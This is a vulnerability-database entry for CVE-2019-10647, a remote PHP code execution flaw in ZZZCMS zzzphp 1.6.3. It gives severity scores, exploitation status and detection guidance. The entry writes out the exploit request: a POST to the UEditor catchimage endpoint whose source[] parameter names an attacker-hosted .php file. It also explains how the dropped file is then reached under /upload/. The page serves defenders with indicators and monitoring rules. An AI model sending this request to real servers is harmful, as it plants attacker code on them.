cbcvebase.
CVE-2019-10647
published 2019-03-30

CVE-2019-10647: ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[]…

PriorityP277critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
6.59%
93.0th percentile
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).

Affected

1 ranges
VendorProductVersion rangeFixed in
zzzcmszzzphp

Detection & IOCsextracted from sources · hover to see the quote

url/plugins/ueditor/php/controller.php?action=catchimage
path/plugins/ueditor/php/controller.php
path/inc/zzz_file.php
path/upload/
commandPOST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1 Content-Type: application/x-www-form-urlencoded source[]=http://{{interactsh-url}}/{{randstr}}.php
  • Detect exploitation attempts by monitoring POST requests to /plugins/ueditor/php/controller.php with action=catchimage and a source[] parameter containing a .php URL
  • A successful exploitation results in a JSON response containing both 'SUCCESS' and 'state' fields with HTTP 200, followed by a GET request to /upload/<filename> to retrieve the dropped PHP file
  • Monitor for out-of-band DNS interactions triggered by the catchimage endpoint fetching attacker-controlled URLs ending in .php — indicative of SSRF/RCE probe
  • The exploit requires the attacker-controlled server to serve PHP code as plain text (not interpreted), so look for HTTP responses with PHP code bodies being fetched by the target server
  • After the catchimage fetch, the uploaded PHP file is stored under /upload/ and can be accessed via GET — monitor for GET requests to /upload/*.php as a sign of post-exploitation access
  • ·Exploitation requires the attacker-controlled server to serve the .php file as plain text (Content-Type: text/plain or similar) rather than executing it — the vulnerability is in the target's lack of file-type restriction, not the source server's PHP execution
  • ·The Nuclei template uses a two-step flow: step 1 triggers the catchimage fetch and confirms DNS OOB interaction + SUCCESS response; step 2 GETs the uploaded file — both steps must succeed for confirmed exploitation

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.